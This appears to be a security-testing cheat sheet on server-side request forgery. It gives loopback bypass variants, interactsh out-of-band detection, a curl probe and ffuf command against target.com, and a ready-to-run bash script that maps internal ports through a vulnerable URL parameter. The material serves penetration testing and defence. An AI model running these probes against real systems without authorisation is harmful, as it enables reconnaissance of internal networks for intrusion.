SSRF
Server-side request forgery
Enumeration
Look for parameters that accept URLs: redirect targets, webhook endpoints, image or PDF fetchers, "import from URL" features, and file uploads that take a remote path.
Test with http://localhost or http://127.0.0.1 and compare the response to one for a known-external URL. If the plain loopback address is rejected, try equivalents such as http://127.1, http://[::1] or http://0.0.0.0, which is a common sign that a denylist rather than an allowlist is in place.
Use Interactsh to detect out-of-band (OOB) interactions: start the client, put the generated hostname in the URL parameter, and watch for DNS or HTTP callbacks. A DNS lookup with no HTTP request still proves that the server resolved the name, which is enough to confirm server-side fetching even when the response is not reflected.
interactsh-client
Internal Port Scanning
Test for internal port access:
curl "https://target.com/ssrf?url=http://localhost:22" -v
Use time-based delays or OOB techniques to detect open ports. Take a baseline from a port that is almost certainly closed and compare response time and body size against it: a refused connection returns almost immediately, while a port that accepts the connection and leaves the server's HTTP client waiting, or a filtered port, is noticeably slower. A different error message or body length for a port is also a sign that something answered on it.
ffuf -w ports.txt -u "https://target.com/ssrf?url=http://localhost:FUZZ" -mc 200 -t 10
The -mc 200 filter only works when the application returns a different status for failed fetches. If it answers 200 for every port, match all statuses (-mc all) and filter out the closed-port response size with -fs instead; keep the thread count low so that response times stay comparable.
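The probe described above, carried through as a script that records size and timing per port and classifies each one against a closed-port baseline. This is an added example, not code from the original page; the endpoint https://target.com/ssrf?url= and the ports.txt wordlist are assumed placeholders, and the thresholds are heuristics to tune per target.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): probe internal ports through an
# SSRF parameter and classify each port by response size and timing instead of
# by HTTP status alone, which the vulnerable app often returns unchanged.
# Assumed (hypothetical) vulnerable endpoint: https://target.com/ssrf?url=<URL>
set -u

TARGET="${TARGET:-https://target.com/ssrf?url=}"
CONNECT_TIMEOUT=15

# Send one probe for PORT and print: "<port> <http_code> <size_bytes> <time_seconds>".
probe_port() {
  local port="$1"
  curl -s -o /dev/null --max-time "$CONNECT_TIMEOUT" \
    -w "${port} %{http_code} %{size_download} %{time_total}\n" \
    "${TARGET}http://127.0.0.1:${port}/"
}

# Compare one probe against a baseline measured on a port that is almost
# certainly closed. The status code is deliberately ignored; the app usually
# wraps the server-side fetch and answers the same status for every port.
#   open-or-filtered : the fetch took much longer than the baseline, which is
#                      what an accepted-but-silent connection or a dropped
#                      packet looks like next to an immediate RST
#   open             : the body size differs from the baseline, i.e. the app
#                      relayed different content or a different backend error
#   closed           : same size and comparable timing as the baseline
# Usage: classify_probe <size> <time> <baseline_size> <baseline_time>
classify_probe() {
  local size="$1" time="$2" base_size="$3" base_time="$4"
  # "Much longer" = more than twice the baseline plus one second (heuristic).
  if awk -v t="$time" -v b="$base_time" 'BEGIN { exit (t > 2 * b + 1.0) ? 0 : 1 }'; then
    echo "open-or-filtered"
  elif [ "$size" != "$base_size" ]; then
    echo "open"
  else
    echo "closed"
  fi
}

# Scan every port listed in PORTFILE (one per line), taking the baseline from
# a port that should be closed (TCP port 1 by default).
scan_ports() {
  local portfile="$1" baseline_port="${2:-1}"
  local base line port code size time base_size base_time
  base=$(probe_port "$baseline_port")
  set -- $base
  base_size="$3"; base_time="$4"
  while read -r port; do
    [ -z "$port" ] && continue
    line=$(probe_port "$port")
    set -- $line
    code="$2"; size="$3"; time="$4"
    printf '%-6s %-16s (status=%s size=%s time=%ss)\n' \
      "$port" "$(classify_probe "$size" "$time" "$base_size" "$base_time")" \
      "$code" "$size" "$time"
  done < "$portfile"
}

# Usage: ./ssrf_portscan.sh ports.txt [baseline_port]
# The scan only starts when a wordlist is given, so the file can be sourced.
if [ "$#" -gt 0 ]; then
  scan_ports "$@"
fi
```

Ports are probed one at a time on purpose: parallel requests skew the timing signal, and a sequential scan through an SSRF endpoint is slow enough that a short, targeted wordlist (22, 25, 80, 443, 3306, 5432, 6379, 8080, 9200 and the like) is usually the right starting point.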